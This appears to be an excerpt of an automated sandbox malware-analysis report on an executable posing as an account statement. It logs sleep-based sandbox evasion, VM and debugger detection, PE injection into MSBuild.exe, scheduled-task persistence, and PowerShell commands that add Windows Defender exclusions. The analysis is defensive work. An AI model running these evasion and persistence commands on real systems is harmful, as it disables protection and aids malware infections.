                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -99109s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -99000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -98891s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -98781s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -98672s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -98563s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -98438s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -98313s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -98188s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -98078s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe TID: 5804Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -23980767295822402s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -99875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1656Thread sleep count: 1671 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1656Thread sleep count: 8186 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -99766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -99656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -99547s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -99438s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -99328s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -99219s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -99094s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -98968s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -98859s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -98750s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -98641s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -98516s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -98384s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -98281s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -98172s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -98063s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -97938s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -97813s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -97703s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -97594s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -97469s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -97359s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -97250s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -97141s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -97029s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -96918s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -96812s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -96703s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -96594s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -96469s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -96359s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -96250s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -96141s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -96031s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -95922s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -95813s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -95688s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -95563s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -95453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -95344s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -95219s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -95109s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -95000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -94888s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -94781s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -94672s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -94563s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5668Thread sleep time: -94438s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98078Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98516
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98384
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98063
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97703
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97594
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97029
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96918
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96812
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96703
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96594
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96031
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95922
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94888
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94438
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\NULLJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                    Source: TgfQNrhQjjseHY.exe, 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: TgfQNrhQjjseHY.exe, 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: MSBuild.exe, 00000008.00000002.2165476952.0000000006287000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3358366394.0000000005C82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_012670B0 CheckRemoteDebuggerPresent,8_2_012670B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe"
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe"
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe"Jump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000Jump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F7F008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 440000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 697008Jump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpD609.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeQueries volume information: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
